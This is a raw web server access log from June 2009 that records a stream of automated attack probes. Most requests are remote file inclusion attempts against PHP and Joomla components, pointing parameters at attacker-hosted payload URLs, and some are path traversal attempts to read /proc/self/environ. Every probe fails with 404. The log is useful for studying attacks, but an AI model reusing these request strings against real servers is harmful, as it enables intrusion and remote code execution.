209.59.12.99 - - [06/Jun/2009:06:27:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.106 - - [06/Jun/2009:06:29:30 -0400] "GET /bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.151.233.106 - - [06/Jun/2009:06:29:30 -0400] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
203.151.233.106 - - [06/Jun/2009:06:29:31 -0400] "GET /logs/access_log.Q109052900/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.49.99.7 - - [06/Jun/2009:06:29:33 -0400] "GET /bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.49.99.7 - - [06/Jun/2009:06:29:33 -0400] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.162.25.67 - - [06/Jun/2009:06:29:35 -0400] "GET /logs/error_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://alinutz.do.am/v1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.49.99.7 - - [06/Jun/2009:06:29:40 -0400] "GET /logs/access_log.Q109052900/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.151.233.106 - - [06/Jun/2009:06:30:02 -0400] "GET /logs/access_log.Q109053000/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:06:30:24 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:06:30:33 -0400] "GET /logs/access_log.Q109010700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:06:30:33 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:06:30:33 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:06:30:34 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:06:30:34 -0400] "GET /logs/access_log.Q109010700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.49.99.7 - - [06/Jun/2009:06:30:42 -0400] "GET /logs/access_log.Q109053000/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:06:30:50 -0400] "GET /logs/access_log.Q109010700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:06:30:51 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:06:30:51 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:31:04 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:31:04 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:31:05 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:06:32:13 -0400] "GET /logs/access_log.Q109051800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:06:32:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.111.80.18 - - [06/Jun/2009:06:32:42 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.162.25.67 - - [06/Jun/2009:06:32:51 -0400] "GET /logs/error_log.Q108080500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://alinutz.do.am/v1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:06:32:52 -0400] "GET /logs/access_log.Q109051800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.73.144.26 - - [06/Jun/2009:06:33:03 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.73.144.26 - - [06/Jun/2009:06:33:03 -0400] "GET //atom.php5?page=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.73.144.26 - - [06/Jun/2009:06:33:13 -0400] "GET //atom.php5?page=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
125.131.116.12 - - [06/Jun/2009:06:33:31 -0400] "GET /logs/access_log.Q109051800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.73.144.26 - - [06/Jun/2009:06:33:34 -0400] "GET /logs/error_log.Q108091700//atom.php5?page=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
203.151.233.106 - - [06/Jun/2009:06:33:36 -0400] "GET /bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.151.233.106 - - [06/Jun/2009:06:33:36 -0400] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
203.151.233.106 - - [06/Jun/2009:06:33:36 -0400] "GET /logs/access_log.Q109052900/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.151.233.106 - - [06/Jun/2009:06:33:46 -0400] "GET /logs/access_log.Q109053000/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.73.144.26 - - [06/Jun/2009:06:33:48 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:33:48 -0400] "GET //atom.php5?page=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:33:48 -0400] "GET /logs//atom.php5?page=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
78.111.80.18 - - [06/Jun/2009:06:34:00 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:34:30 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.73.144.26 - - [06/Jun/2009:06:34:43 -0400] "GET /logs/error_log.Q108091700//atom.php5?page=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
74.6.8.112 - - [06/Jun/2009:06:34:50 -0400] "GET /logs/access_log.Q107101600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.2 - - [06/Jun/2009:06:35:23 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
77.221.130.2 - - [06/Jun/2009:06:35:23 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
77.221.130.2 - - [06/Jun/2009:06:35:23 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
77.221.130.2 - - [06/Jun/2009:06:35:23 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
77.221.130.2 - - [06/Jun/2009:06:35:23 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:35:23 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:35:24 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:35:24 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:35:32 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
77.221.130.2 - - [06/Jun/2009:06:35:32 -0400] "GET /logs/error_log.Q109051400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
77.221.130.2 - - [06/Jun/2009:06:35:33 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
77.221.130.2 - - [06/Jun/2009:06:35:33 -0400] "GET /logs/error_log.Q109051400/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
77.221.130.2 - - [06/Jun/2009:06:35:33 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:35:33 -0400] "GET /logs/error_log.Q109051400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:35:33 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:35:33 -0400] "GET /logs/error_log.Q109051400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
209.59.12.99 - - [06/Jun/2009:06:37:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.73.144.26 - - [06/Jun/2009:06:38:53 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.73.144.26 - - [06/Jun/2009:06:38:53 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 232 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.73.144.26 - - [06/Jun/2009:06:39:08 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.73.144.26 - - [06/Jun/2009:06:39:21 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:39:35 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:39:35 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:39:35 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:39:43 -0400] "GET /logs/access_log.Q109031800//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.73.144.26 - - [06/Jun/2009:06:39:43 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.237.82.158 - - [06/Jun/2009:06:39:55 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.237.82.158 - - [06/Jun/2009:06:39:57 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.237.82.158 - - [06/Jun/2009:06:39:57 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.73.144.26 - - [06/Jun/2009:06:39:59 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.810"
217.147.30.80 - - [06/Jun/2009:06:40:08 -0400] "GET //exibir.php?arquivo=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:08 -0400] "GET /logs//exibir.php?arquivo=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:12 -0400] "GET //exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:12 -0400] "GET /logs/error_log.Q109051400//exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:14 -0400] "GET /logs/access_log.Q109053100//exibir.php?arquivo=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:14 -0400] "GET /logs//exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:17 -0400] "GET /logs/access_log.Q109053100//exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.73.144.26 - - [06/Jun/2009:06:40:23 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
217.147.30.80 - - [06/Jun/2009:06:40:28 -0400] "GET //exibir.php?arquivo=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:29 -0400] "GET /logs//exibir.php?arquivo=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:35 -0400] "GET /logs/access_log.Q109053100%20%20//exibir.php?arquivo=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:38 -0400] "GET /logs/error_log.Q109051400%20%20//exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:39 -0400] "GET /logs//exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:39 -0400] "GET //exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:40 -0400] "GET //exibir.php?arquivo=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:41 -0400] "GET /logs//exibir.php?arquivo=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:42 -0400] "GET /logs/access_log.Q109053100%20%20//exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:40:43 -0400] "GET /logs/access_log.Q109053100//exibir.php?arquivo=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:41:10 -0400] "GET /logs/error_log.Q109051400//exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:41:10 -0400] "GET //exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:41:10 -0400] "GET /logs//exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:06:41:14 -0400] "GET /logs/access_log.Q109053100//exibir.php?arquivo=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.73.144.26 - - [06/Jun/2009:06:41:39 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.73.144.26 - - [06/Jun/2009:06:41:48 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:41:48 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:41:48 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
209.59.12.99 - - [06/Jun/2009:06:42:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.73.144.26 - - [06/Jun/2009:06:44:10 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
203.189.120.183 - - [06/Jun/2009:06:45:05 -0400] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://solelyyoursgem.com/img/products/jan/bot/coracore/id.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.813"
94.23.200.54 - - [06/Jun/2009:06:45:39 -0400] "GET /adminstrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:06:45:39 -0400] "GET /logs/adminstrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:06:45:39 -0400] "GET /logs/access_log.Q109052900/adminstrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
69.73.144.26 - - [06/Jun/2009:06:46:04 -0400] "GET /logs/access_log.Q109050300//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:46:04 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:46:04 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.810"
203.189.120.183 - - [06/Jun/2009:06:47:07 -0400] "GET /logs/access_log.Q109051700//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://solelyyoursgem.com/img/products/jan/bot/coracore/id.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.813"
203.189.120.183 - - [06/Jun/2009:06:47:07 -0400] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://solelyyoursgem.com/img/products/jan/bot/coracore/id.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.813"
203.189.120.183 - - [06/Jun/2009:06:47:09 -0400] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://solelyyoursgem.com/img/products/jan/bot/coracore/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
203.189.120.183 - - [06/Jun/2009:06:47:09 -0400] "GET /logs/access_log.Q109052700//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://solelyyoursgem.com/img/products/jan/bot/coracore/id.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.813"
209.59.12.99 - - [06/Jun/2009:06:47:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.38.54.140 - - [06/Jun/2009:06:47:26 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:06:47:26 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:06:47:26 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:06:47:30 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
83.149.105.122 - - [06/Jun/2009:06:47:53 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.149.105.122 - - [06/Jun/2009:06:47:53 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
